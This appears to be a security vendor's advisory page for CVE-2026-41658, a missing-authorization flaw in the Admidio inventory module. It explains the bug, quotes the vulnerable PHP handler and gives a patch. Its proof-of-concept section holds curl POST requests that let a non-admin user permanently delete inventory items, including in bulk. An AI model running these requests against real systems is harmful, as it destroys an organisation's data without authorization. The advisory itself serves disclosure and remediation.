CVE-2026-41658

CVE-2026-41658 is a medium-severity missing authorization vulnerability in admidio/admidio (composer), affecting versions <= 5.0.8. It is fixed in 5.0.9.

Summary

The Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data.

Details

The inventory module applies a module-level access control check at modules/inventory.php:65-72 that determines whether a user can access the inventory module at all, based on the inventory_module_enabled setting. In the default configuration (value 2), any logged-in user passes this check.

The item_delete handler at lines 381-397 only validates the CSRF token:

// modules/inventory.php:381-397
case 'item_delete':
    // check the CSRF token of the form against the session token
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);

    if (count($getItemUUIDs) > 0) {
        foreach ($getItemUUIDs as $itemUuid) {
            $itemService = new ItemService($gDb, $itemUuid);
            $itemService->delete();
        }
        echo json_encode(array('status' => 'success', 'message' => $gL10n->get('SYS_INVENTORY_SELECTION_DELETED')));
    } else {
        $itemService = new ItemService($gDb, $getiniUUID);
        $itemService->delete();
        echo json_encode(array('status' => 'success', 'message' => $gL10n->get('SYS_INVENTORY_ITEM_DELETED')));
    }
    break;

There is no call to $gCurrentUser->isAdministratorInventory() before executing the deletion. The service layer (ItemService::delete() at src/Inventory/Service/ItemService.php:86-92) and the data layer (ItemsData::deleteItem() at src/Inventory/ValueObjects/ItemsData.php:1078-1095) also contain no authorization checks, they directly execute DELETE FROM SQL statements on the item data, borrow data, and item tables.

Meanwhile, the UI does check admin status before showing delete buttons:

// modules/inventory.php:306-309 (UI only)
if ($gCurrentUser->isAdministratorInventory()) {
    $msg .= '<button id="adm_button_delete" ...>';
}

This creates a false sense of security, the button is hidden, but the endpoint is fully accessible. Item UUIDs needed for the attack are visible to all users who can view the inventory list.

The same missing-authorization pattern affects:

  • item_retire (line 347), soft-retires items without admin check
  • item_reinstate (line 364), reinstates retired items without admin check
  • item_picture_upload (line 428), uploads pictures without admin check
  • item_picture_save (line 445), saves pictures without admin check
  • item_picture_delete (line 457), deletes pictures without admin check

PoC

Prerequisites: An Admidio instance with the inventory module enabled (default setting inventory_module_enabled=2), two user accounts, one admin who created inventory items, and one regular user with no inventory admin rights.

# Step 1: Log in as a regular (non-admin) user and get session cookie + CSRF token
# The CSRF token is embedded in any page the user can access
curl -c cookies.txt -b cookies.txt 'https://target/adm_program/modules/inventory.php?mode=item_list'

# Step 2: Extract a target item UUID from the inventory list page
# Item UUIDs are visible in the list view HTML to all users with module access

# Step 3: Permanently delete the item (as a non-admin user)
curl -X POST 'https://target/adm_program/modules/inventory.php?mode=item_delete&item_uuid=TARGET-ITEM-UUID' \
  -H 'Cookie: PHPSESSID=regular_user_session' \
  -d 'adm_csrf_token=EXTRACTED_CSRF_TOKEN'

# Expected response: {"status":"success","message":"Item deleted"}
# The item and all associated data (item fields, borrow records) are permanently deleted.

# Step 4: Bulk deletion is also possible
curl -X POST 'https://target/adm_program/modules/inventory.php?mode=item_delete&item_uuids[]=UUID1&item_uuids[]=UUID2&item_uuids[]=UUID3' \
  -H 'Cookie: PHPSESSID=regular_user_session' \
  -d 'adm_csrf_token=EXTRACTED_CSRF_TOKEN'

Impact

  • Data destruction: Any authenticated user can permanently delete any inventory item, including all associated field data and borrow records. There is no soft-delete or recycle bin, the SQL DELETE FROM statements are irreversible without database backups.
  • Bulk deletion: The endpoint accepts multiple item UUIDs, allowing an attacker to delete all inventory items in a single request.
  • Additional unauthorized operations: The same pattern allows non-admin users to retire/reinstate items and upload/modify/delete item pictures, undermining the entire inventory permission model.
  • Blast radius: In organizations using Admidio's inventory module to track physical assets, a disgruntled member or compromised low-privilege account could wipe the entire inventory database.

The application does not perform an authorization check before performing a sensitive operation. Typical impact: unauthorized access to restricted functionality or data.

CVE-2026-41658 has a CVSS score of 6.5 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (5.0.9); upgrading removes the vulnerable code path.

Affected versions

admidio/admidio (<= 5.0.8)

Security releases

admidio/admidio → 5.0.9 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Add isAdministratorInventory() checks to all destructive inventory endpoints. The fix should be applied at the handler level in modules/inventory.php before any service calls:

// modules/inventory.php, Add authorization check to item_delete
case 'item_delete':
    // check the CSRF token of the form against the session token
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);

    // ADD THIS: check if user has admin rights for inventory
    if (!$gCurrentUser->isAdministratorInventory()) {
        throw new Exception('SYS_NO_RIGHTS');
    }

    if (count($getItemUUIDs) > 0) {
        // ... existing code

Apply the same pattern to item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete. Additionally, consider adding authorization checks in ItemService methods as defense-in-depth.

Frequently Asked Questions

  1. What is CVE-2026-41658? CVE-2026-41658 is a medium-severity missing authorization vulnerability in admidio/admidio (composer), affecting versions <= 5.0.8. It is fixed in 5.0.9. The application does not perform an authorization check before performing a sensitive operation.
  2. How severe is CVE-2026-41658? CVE-2026-41658 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of admidio/admidio are affected by CVE-2026-41658? admidio/admidio (composer) versions <= 5.0.8 is affected.
  4. Is there a fix for CVE-2026-41658? Yes. CVE-2026-41658 is fixed in 5.0.9. Upgrade to this version or later.
  5. Is CVE-2026-41658 exploitable, and should I be worried? Whether CVE-2026-41658 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-41658 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-41658? Upgrade admidio/admidio to 5.0.9 or later.

Other vulnerabilities in admidio/admidio

CVE-2026-47233CVE-2026-47234CVE-2026-47232CVE-2026-47231CVE-2026-47230

Stop the waste.
Protect your environment with Kodem.